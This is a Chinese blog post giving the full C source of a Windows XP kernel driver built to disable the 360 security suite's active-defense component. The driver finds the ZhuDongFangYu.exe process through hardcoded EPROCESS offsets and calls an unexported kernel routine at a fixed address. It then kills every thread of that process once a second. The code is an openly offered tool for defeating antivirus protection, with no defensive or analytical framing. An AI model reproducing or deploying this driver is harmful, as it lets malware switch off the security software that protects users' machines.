WinXp下干翻360主动防御

#include <Ntifs.h>
// Kill 360 Defense
// 定义函数原型
typedef NTSTATUS (*pPspTerminateThreadByPointer)(ULONG Thread/*要结束的线程结构体*/,
       int ExitStatus, int DirectTerminate);
pPspTerminateThreadByPointer PspTerminateThreadByPointer;
// 通过 _EPROCESS.SeAuditProcessCreationInfo.Name 获取进程名称
VOID StrSubProcessName(PCHAR * Name)
{
       ULONG NameLen = strlen(*Name);
       ULONG index = 0;
       // 指向字符串末尾
       (*Name) += NameLen;
       while (*Name != '\0')
       {
              // 判断是否为 \或者 /
              if (**Name == '\\' || **Name == '/')
              {
                     // 找到, 获取名称           
                     *Name = (*Name) + 1;
                     break;
              }
              (*Name)--;
              index++;
       }
}
// 获取指定的进程
// 遍历返回目标进程的 EPROCESS
ULONG EnumGetTargetProcess(PCHAR ProcessName)
{
       CHAR Buffer[100] = { 0 };
       ANSI_STRING ANextProcessName;
       RtlInitAnsiString(&ANextProcessName, Buffer);
       // KPCR.PrcbData.CurrentThread.ApcState.Process 存储的是当前进程的 EPROCESS   地址
       ULONG CurrentEprocess = 0;
       __asm
       {
              mov eax, dword ptr fs : [0x124]; // 获取 KPCR.PrcbData.CurrentThread
              mov ecx, dword ptr[eax + 0x44]; // 获取   CurrentThread.ApcState.Proces
              mov CurrentEprocess, ecx;
       }
       // _EPROCESS.ActiveProcessLinks 存储的是当前系统活动进程的链表
       PLIST_ENTRY ProcessEntry = (PLIST_ENTRY)(CurrentEprocess + 0x88); //   ActiveProcessLinks
       PLIST_ENTRY CurrentProcessEntry = ProcessEntry;
       while (CurrentProcessEntry->Flink != ProcessEntry)
       {
              // 循环进程链表获取目标进程
              // 获取当前进程 EPROCESS 的首地址
              ULONG NextEprocess = (ULONG)CurrentProcessEntry - 0x88;
              // 获取当前进程的名称 _EPROCESS.SeAuditProcessCreationInfo.Name
              PUNICODE_STRING NextProcessName =  (PUNICODE_STRING)(*(PULONG)(NextEprocess + 0x1f4));
              // Unicode 转 Ansi
              RtlUnicodeStringToAnsiString(&ANextProcessName, NextProcessName,  TRUE);
              PCHAR Name = ANextProcessName.Buffer;
              StrSubProcessName(&Name);
              if (_strnicmp(Name, ProcessName, strlen(ProcessName)) == 0)
              {
                     RtlFreeAnsiString(&ANextProcessName);
                     // 如果为指定进程,返回 EPROCESS 的首地址
                     return NextEprocess;
              }
              RtlFreeAnsiString(&ANextProcessName);
              // 否则继续循环
              CurrentProcessEntry = CurrentProcessEntry->Flink;
       }
       // 到达这里表示没有找到,指定进程
       return 0;
}
// 获取指定进程的活动线程链表
PLIST_ENTRY GetThreadEntry(ULONG Eprocess)
{
       // _EPROCESS.ThreadListHead 是当前进程的活动线程链表
       return (PLIST_ENTRY)(*(PULONG)(Eprocess + 0x190));
}
// 遍历链表, 将进程中的线程逐一杀死
NTSTATUS KillALLThread(PLIST_ENTRY ThreadListEntry)
{
       // 获取当前线程
       PETHREAD Self = PsGetCurrentThread();
       PLIST_ENTRY CurrentListEntry = ThreadListEntry;
       NTSTATUS status = STATUS_SUCCESS;
       while (CurrentListEntry->Flink != ThreadListEntry)
       {
              // 获取线程结构体地址  ThreadListEntry 0x1b0
              ULONG kthread = (ULONG)CurrentListEntry - 0x22C;
              // 获取进程结构体地址 ThreadsProcess 0x220
              ULONG eprocess = *(PULONG)(kthread + 0x220);
              if (kthread < 0x80000000) goto Next;
              if (!eprocess) goto Next;
              if ((ULONG)Self == kthread)
              {
                     PspTerminateThreadByPointer(kthread, 0, 1);
                     goto Next;
              }
              // 循环结束线程
              PspTerminateThreadByPointer(kthread, 0, 0);
Next:
              CurrentListEntry = CurrentListEntry->Flink;
       }
       return status;
}
VOID Unload(PDRIVER_OBJECT DriverObject)
{
       DbgPrint("驱动卸载\n");
}
NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING Regedit)
{
       //KdBreakPoint();
       DbgPrint("驱动加载\n");
       NTSTATUS status = STATUS_SUCCESS;
       DriverObject->DriverUnload = Unload;
       // 获取指定函数地址
       PspTerminateThreadByPointer = (pPspTerminateThreadByPointer)0x805c9b02;
       // 获取指定进程
       ULONG Eprocess = EnumGetTargetProcess("ZhuDongFangYu.exe");
       LARGE_INTEGER timeOut = RtlConvertLongToLargeInteger(-10 * 1000 * 1000);
       while (Eprocess)
       {
              // 1秒钟 杀一次 360
              KeDelayExecutionThread(KernelMode, FALSE, &timeOut);
              PLIST_ENTRY ThreadListEntry = GetThreadEntry(Eprocess);
              KillALLThread(ThreadListEntry);
       }
       return status;
}

原创文章,转载请注明: 转载自Windows内核安全驱动编程

本文链接地址: WinXp下干翻360主动防御

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注